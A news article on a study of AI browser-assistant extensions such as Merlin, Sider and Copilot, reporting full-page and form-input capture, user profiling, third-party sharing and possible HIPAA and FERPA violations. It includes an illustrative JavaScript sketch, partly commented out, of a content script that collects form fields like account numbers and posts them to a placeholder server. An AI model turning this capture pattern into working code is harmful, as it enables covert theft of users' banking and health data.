AI Web Browser Assistants Raise Serious Privacy Concerns, Study Reveals

Reviewed by Nidhi Govil


A new study uncovers widespread privacy issues with AI-powered web browser assistants, revealing that they collect and share sensitive user data without adequate safeguards.

AI Browser Assistants: A Privacy Nightmare

A groundbreaking study led by researchers from University College London (UCL) and Mediterranea University of Reggio Calabria has uncovered alarming privacy issues associated with popular AI-powered web browser assistants. The research, presented at the USENIX Security Symposium, reveals that these tools are collecting and sharing sensitive user data without adequate safeguards [1].

Widespread Data Collection and Sharing

Source: Tech Xplore


The study analyzed nine of the most popular generative AI browser extensions, including ChatGPT for Google, Merlin, and Copilot. These assistants, designed to enhance web browsing with AI-powered features, were found to engage in extensive data collection from users' web activity [1].

Several assistants were discovered to transmit full webpage content to their servers, including any information visible on screen. Merlin, in particular, was found to capture form inputs such as online banking details and health data [1].
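The capture mechanism described above, a content script reading visible page content and form fields and posting it to a remote server, can be sketched roughly as follows. This is a hypothetical illustration, not code from Merlin or any other assistant; the endpoint URL and field names are placeholders:

```javascript
// Hypothetical sketch of how an extension content script could capture
// form inputs, as the study describes. Placeholder names throughout.

// Pure helper: bundle the page URL and form fields into a payload object.
// Sensitive values (account numbers, health data) are copied verbatim.
function buildPayload(url, fields) {
  return {
    page: url,
    fields: fields.map(({ name, value }) => ({ name, value })),
  };
}

// In a real content script, the fields would come from the live DOM, e.g.:
//   const fields = [...document.querySelectorAll("input, textarea")]
//     .map((el) => ({ name: el.name, value: el.value }));
//   fetch("https://assistant.example/collect", {   // placeholder endpoint
//     method: "POST",
//     body: JSON.stringify(buildPayload(location.href, fields)),
//   });

// Demonstration with mock data:
const payload = buildPayload("https://bank.example/login", [
  { name: "account", value: "12345678" },
]);
console.log(payload.fields[0].name); // "account"
```

Because content scripts run with access to the full DOM of every page they are permitted on, everything visible on screen is reachable this way.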

User Profiling and Personalization

The research revealed that some assistants, including ChatGPT for Google, Copilot, Monica, and Sider, demonstrated the ability to infer user attributes such as age, gender, income, and interests. This information was then used to personalize responses across different browsing sessions [1].

Third-Party Data Sharing

Extensions like Sider and TinaMind were found to share user questions and identifying information, such as IP addresses, with platforms like Google Analytics. This practice enables potential cross-site tracking and ad targeting [2].

Violation of Privacy Laws

The study highlighted that some assistants potentially violate US data protection laws such as HIPAA and FERPA by collecting protected health and educational information. While the study focused on US regulations, the authors suggest that these practices would likely violate more stringent UK and EU data laws as well [1].

Methodology and Findings

Researchers simulated real-world browsing scenarios using a persona of a "rich, millennial male from California." They conducted tests in both public (logged-out) and private (logged-in) spaces, including activities such as online shopping, accessing health portals, and using dating services [1].

The experiments revealed that some assistants, including Merlin and Sider, did not cease recording activity when users switched to private browsing modes [1].

Implications and Recommendations

Dr. Anna Maria Mandalari, senior author of the study, emphasized the unprecedented access these AI browser assistants have to users' online behavior in areas that should remain private. She warned about the potential consequences of such data collection, including the risk of data breaches [1].

The authors recommend that developers adopt privacy-by-design principles, such as local processing or explicit user consent for data collection. They also call for greater regulatory oversight to protect users' personal data [1].
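The local-processing recommendation could, for example, mean redacting likely sensitive form fields inside the browser before anything is transmitted. A minimal sketch, using a hypothetical pattern and field names (not from the study):

```javascript
// Hypothetical privacy-by-design sketch: redact likely sensitive form
// fields locally, so only redacted data could ever leave the browser.
// The pattern below is illustrative, not exhaustive.
const SENSITIVE = /pass(word)?|ssn|account|card|health|dob/i;

function redactFields(fields) {
  return fields.map(({ name, value }) =>
    SENSITIVE.test(name) ? { name, value: "[REDACTED]" } : { name, value }
  );
}

const cleaned = redactFields([
  { name: "query", value: "best savings rate" },
  { name: "account", value: "12345678" },
]);
console.log(cleaned[1].value); // "[REDACTED]"
```

The design choice here is that redaction happens before any network call, so a server-side bug or breach cannot expose what was never sent.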

A Call for Transparency and User Control

As generative AI becomes more integrated into our digital lives, the study underscores the urgent need to balance convenience with privacy. Dr. Aurelio Canino, an author of the study, stressed the importance of ensuring that privacy is not sacrificed for convenience in this rapidly evolving technological landscape [1].
